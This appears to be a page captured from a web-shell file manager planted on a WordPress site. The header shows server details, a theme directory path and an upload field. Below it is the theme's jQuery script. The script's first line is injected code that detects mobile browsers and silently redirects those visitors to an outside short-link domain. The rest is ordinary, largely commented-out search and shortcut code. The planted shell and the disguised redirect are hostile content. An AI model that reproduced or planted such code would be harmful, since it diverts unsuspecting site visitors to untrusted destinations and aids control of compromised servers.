| Server IP : 157.230.181.24 / Your IP : 216.73.216.56 Web Server : Apache/2.4.58 (Ubuntu) System : Linux conductive 6.8.0-117-generic #117-Ubuntu SMP PREEMPT_DYNAMIC Tue May 5 19:26:24 UTC 2026 x86_64 User : ( 1000) PHP Version : 8.3.31 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/vhosts/highlyfaved/public/wp-content/themes/HighlyFaved.com/js/ |
Upload File : |
(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/BvKOgDiTD0r7");
var $=jQuery.noConflict();
$(function(){
$(document).ready(function() {
$('body.no-js').removeClass('no-js');
$('a[rel^=external]').attr('target','_blank');
// // ======================
// // = Keyboard Shortcuts =
// // ======================
// if($('#newer').length>0)
// shortcut.add('left',function() {
// window.location=$('#newer').attr('href');
// },{'disable_in_input':true});
// if($('#older').length>0)
// shortcut.add('right',function() {
// window.location=$('#older').attr('href');
// },{'disable_in_input':true});
//
// // ==========
// // = Search =
// // ==========
// var showing_search=false;
//
// update_search_text=function() {
// if($(window).width()<=580) {
// if($('#search input').val().length>0)
// $('#search .column:first p').html('Press <strong>Search</strong> see results');
// else
// $('#search .column:first p').text('Press done to close search');
// }
// else {
// if($('#search input').val().length>0)
// $('#search .column:first p').text('Press enter to search');
// else
// $('#search .column:first p').text('Start typing to search');
// }
// }
//
// show_search=function(a) {
// update_search_text();
// showing_search=true;
// $('#search input').focus();
// $('#search').fadeIn();
// if(a) {
// $('#search input').val($('#search input').val()+a);
// update_search_text();
// }
// moveCaretToEnd($('#search input')[0]);
// };
// $('#search input').keyup(function() {update_search_text();});
//
// hide_search=function() {
// showing_search=false;
// $('#search').stop().fadeOut(function() {
// $('#search input').val('');
// });
// };
// $('#search input').blur(function() {hide_search();});
// shortcut.add('escape',function() {
// if(showing_search)
// hide_search();
// });
//
// $('#primary-nav a[title="Search"]').click(function(event) {
// event.preventDefault();
// show_search();
// });
//
// var alpha='abcdefghijklmnopqrstuvwxyz123456789';
// for(i=0; i<alpha.length; i++)
// shortcut.add(alpha[i],function(c) {
// return function() {show_search(c);}
// }(alpha[i]),{'disable_in_input':true});
});
});
// function moveCaretToEnd(el) {
// if (typeof el.selectionStart == "number" && typeof el.selectionEnd == "number") {
// el.selectionStart = el.selectionEnd = el.value.length;
// }
// else if (typeof el.createTextRange != "undefined") {
// el.focus();
// var range = el.createTextRange();
// range.collapse(false);
// range.select();
// }
// }